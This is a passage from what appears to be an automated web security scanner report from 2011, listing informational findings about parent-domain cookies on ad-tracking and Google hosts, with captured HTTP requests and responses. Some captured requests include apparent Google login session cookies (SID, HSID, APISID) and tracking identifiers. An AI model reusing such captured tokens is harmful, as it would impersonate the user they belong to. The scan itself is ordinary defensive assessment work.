Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; aps=2; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199;expires=Mon, 17 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5107
Date: Sat, 17 Sep 2011 01:48:54 GMT
Connection: close



11.62. http://g2.gumgum.com/services/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g2.gumgum.com
Path:   /services/get

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/get?callback=GUMGUM.startServices&_=1316238826949&pubdata={%22t%22:%22tmzdtcom%22,%22v%22:1,%22r%22:%229926v3%22,%22rf%22:%22%22} HTTP/1.1
Host: g2.gumgum.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Date: Sat, 17 Sep 2011 00:53:25 GMT
Server: nginx/0.6.35
Set-Cookie: ggtests=t3%3D44%26t2%3D23%26t1%3D49%26t10%3D48%26t11%3D50%26t4%3D7%26t6%3D43%26t7%3D45%26t9%3D47; Domain=.gumgum.com; Path=/
Content-Length: 263
Connection: keep-alive

GUMGUM.startServices({"at":{"mh":200,"sf":true,"mw":200,"ps":true},"pxs":{"across33":true,"qsg":"Entertainment.tmzdtcom","media6":true,"qac":"p-00TsOkvHvnsZU","file":"pixels","priority":9,"quantcast":
...[SNIP]...

11.63. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1030885431/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1030885431/?label=rTvUCIe7kwIQt6DI6wM&amp;guid=ON&amp;script=0&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/cntacp_22UverseLPtest_LP_1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sat, 17 Sep 2011 01:39:52 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: id=22ebde8547010054||t=1316223577|et=730|cs=002213fd48e76a563c866b19c6; expires=Mon, 16-Sep-2013 01:39:37 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

11.64. http://i.w55c.net/a.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /a.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a.gif?t=0&id=0RwmgFWNcm0FxUpmSwaz&si=3452826&pcid=1091345&ei=RMX&ci=10733823&p=840&s=http%3A%2F%2Fomg%2Eyahoo%2Ecom%2Fxhr%2Fad%2Flrec%2F2115806991%3Fref%3Dahr0cdovl29tzy55ywhvby5jb20vbmv3cy9hy3ryzxnzzxmtdghhdc1oyxzllxbsyxllzc15b3vuz2vylwfuzc1vbgrlci12zxjzaw9ucy1vzi1hlwnoyxjhy3rlci1pbi10agutc2ftzs1tb3zpzs81nje5oq%3D%3D%26token%3Deb731ec6c7937dc&reqid=1316220820&cat=31 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?5jBaAAKVGAD.yKMAAAAAAPwrKAAAAAAAAgAEAAIAAAAAAP8AAAAGFIUOHgAAAAAAEacQAAAAAACarzQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWRQIAAAAAAAIAAwAAAAAAzczMzMzMIEAAAAAAAAA2QM3MzMzMzCBAAAAAAAAANkDNzMzMzMwgQAAAAAAAADZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADrqdlAFNS8Cjy7X-rGaEQDUVZWwA..T0lAs1kFAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15r02p9vu%2FM%3D787833.14445112.14291879.10366300%2FD%3Do_m_g%2FS%3D2115806991%3ALREC%2FY%3DYAHOO%2FEXP%3D1316228019%2FL%3DmQQbJ2KIOPrpARpjTl.wjR_8Mhd7ak5z75MAB.cM%2FB%3DeV1RS9BDRyA-%2FJ%3D1316220819570445%2FK%3D_ZbShBrEtzuJa.XgV8rN3w%2FA%3D6261235%2FR%3D0%2F%2A%24,http%3A%2F%2Fomg.yahoo.com%2Fxhr%2Fad%2Flrec%2F2115806991%3Fref%3Dahr0cdovl29tzy55ywhvby5jb20vbmv3cy9hy3ryzxnzzxmtdghhdc1oyxzllxbsyxllzc15b3vuz2vylwfuzc1vbgrlci12zxjzaw9ucy1vzi1hlwnoyxjhy3rlci1pbi10agutc2ftzs1tb3zpzs81nje5oq%3D%3D%26token%3Deb731ec6c7937dc,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445112%26Z%3D300x250%26_PVID%3DmQQbJ2KIOPrpARpjTl.wjR%255f8Mhd7ak5z75MAB.cM%26_salt%3D2060818614%26cb%3D1316220819570445%26i%3D148950%26r%3D0,7ba8fdda-e0c7-11e0-89db-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; matchcontextweb=1; matchadbrite=1; matchyahoo=1; matchgoogle=1; matchopenx=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; matchappnexus=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:53 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Mon, 16-Sep-13 00:55:53 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 iad061104000000 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

11.65. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003%26r%3D1%26_salt%3D1775927586%26u%3Dhttp%253A%252F%252Fwww.tmz.com%252F%26u%3Dhttp%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-17; path=/; expires=Fri, 16-Dec-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII2IgDEAoYCyALKAsw497P8wQQ497P8wQYCg..; path=/; expires=Fri, 16-Dec-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb832834=![nC'208WMcbJO=)IE.8XG9mw?enc=AAAAAAAA0D8zMzMzMzPLPwAAAAAAABRAMzMzMzMzyz8AAAAAAADQP2R0GfmjPvdU7_________9j73NOAAAAAP7HBwACAgAAHgAAAAMAAACpIQUAiwMBAAEAAABVU0QAVVNEACwB-gAKJwAAzxEBAgUCAQUAAAAAbBwVWAAAAAA.&tt_code=2298003&click=http://g.ca.bid.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXcAA47SN0XdOlX9e0HqdD7Z8Ii7nMM0PfIY4iij0ZJlViI0INx0IczBWIvSy.5mQmdbn6GYP6N43XtXZP8n1Pz9AHegFRs-%26redirectURL=&pixel=http://g.ca.bid.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26ex_uid=2_-17%26creativeID=112554%26message=eJwtjDEOwDAIA78SMXcAA47SN0XdOlX9e0HqdD7Z8Ii7nMM0PfIY4iij0ZJlViI0INx0IczBWIvSy.5mQmdbn6GYP6N43XtXZP8n1Pz9AHegFRs-%26managed=false&media_subtypes=1; path=/; expires=Sun, 18-Sep-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6Ut0QkM9e5'Qr*jWzO3ob/1(cv<Js6rlVum*:>ocs@7M%8:t3eXJC@?K@i[>J`9NSLP`nwRLqx+G.JQ^]`)*kEk:!Ztw[w#w+(.tK<$?>V@zD>K?zVQUT]!=YY/3jrNv9QS)l*V=N3R]@b(Ybe%!.NEfla34biV:s%>8pI<jm38_hQ<=SycJFMywnGxXvE!Z?VPbGadJl!q; path=/; expires=Fri, 16-Dec-2011 00:52:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:52:51 GMT
Content-Length: 313

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=20&Z=300x250&s=2298003&r=1&_salt=1775927586&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com
...[SNIP]...

11.66. http://id.google.com/verify/EAAAACVdGxrtkWeq3ahmGHeybfM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAACVdGxrtkWeq3ahmGHeybfM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAACVdGxrtkWeq3ahmGHeybfM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/blank.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=Djm0XbQqdqyx8mCQ94q_1GimoHaOQ0BwFrlIqBjOlg=ZpuJ8Yt7gYXTd-0k; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4

Response

HTTP/1.1 200 OK
Set-Cookie: NID=51=Z9pR-TbreYtiwzhbmN2ojBv2fNl1QAPxQeWrm1J_y45P4t6ygVW2ZhFmQnahT2uKQ0N-_KNjVBogcXqLYRGX-7a_XIycsdr1AIwFJAWxlj4C1JiVsaZc2byYK6Ie4Ahz; expires=Sun, 18-Mar-2012 00:23:41 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 17 Sep 2011 00:23:41 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.67. http://id.google.com/verify/EAAAADcsWXnWx7Yx9gMo-IqM7r8.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAADcsWXnWx7Yx9gMo-IqM7r8.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADcsWXnWx7Yx9gMo-IqM7r8.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=51=KTDQapZ4fTpJkeLRTd6jL3qAqoPnuMctz75b7_TrMQ=YoO7IMhzJsvpUm7U; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=51=Djm0XbQqdqyx8mCQ94q_1GimoHaOQ0BwFrlIqBjOlg=ZpuJ8Yt7gYXTd-0k; expires=Sun, 18-Mar-2012 00:23:23 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 17 Sep 2011 00:23:23 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.68. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; USCC=ONE; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:57 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; domain=pubmatic.com; expires=Sat, 06-Sep-2014 14:14:48 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

11.69. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljdsOgjAQRH%2DIQC8gYONDtUJAq2IwBt60VRsFL5GkyNdLlOAHuA%2DbmdnsGYiJD4QNpeccgY%2DRDQSBGLm2PPg7d28AQgjG0B8gFxlJeKM05kmkWWPmmn5mxlbx6SvbPaU06g1NaBiwh1p0iek9X7%2EjP4pBpngHaPu6fulcD5JF457M1ipDvM7PRTHfbnTWiIqnQcEnwOFMFfNU2HkqLzzN6rzcoGX%2ESEeGoarqPrQsrbVZlY0pbqX1BgOmVUg%3D%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1316220738_1316220738684:0654349316815871; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:18 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 539

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljdsOgjAQRH%2DIQC8gYONDtUJAq2IwBt60VRsFL5Gk
...[SNIP]...

11.70. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljdsOgjAQRH%2DIQC8gYONDtUJAq2IwBt60VRsFL5GkyNdLlOAHuA%2DbmdnsGYiJD4QNpeccgY%2DRDQSBGLm2PPg7d28AQgjG0B8gFxlJeKM05kmkWWPmmn5mxlbx6SvbPaU06g1NaBiwh1p0iek9X7%2EjP4pBpngHaPu6fulcD5JF457M1ipDvM7PRTHfbnTWiIqnQcEnwOFMFfNU2HkqLzzN6rzcoGX%2ESEeGoarqPrQsrbVZlY0pbqX1BgOmVUg%3D%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:18 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1316220738_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1316220738; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:18 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2



11.71. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&betr=attwired11_cs=[+]1[720],3[8760] HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/cntacp_22UverseLPtest_LP_1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 01:38:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=qo/cOJoII0bSFA3skjAfqaAcm5nqGgK; domain=advertising.com; expires=Mon, 16-Sep-2013 01:38:50 GMT; path=/
Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sat, 17 Sep 2011 02:38:50 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.72. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&betr=attwired11_cs=[+]1[720],3[8760] HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Sep 2011 01:10:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
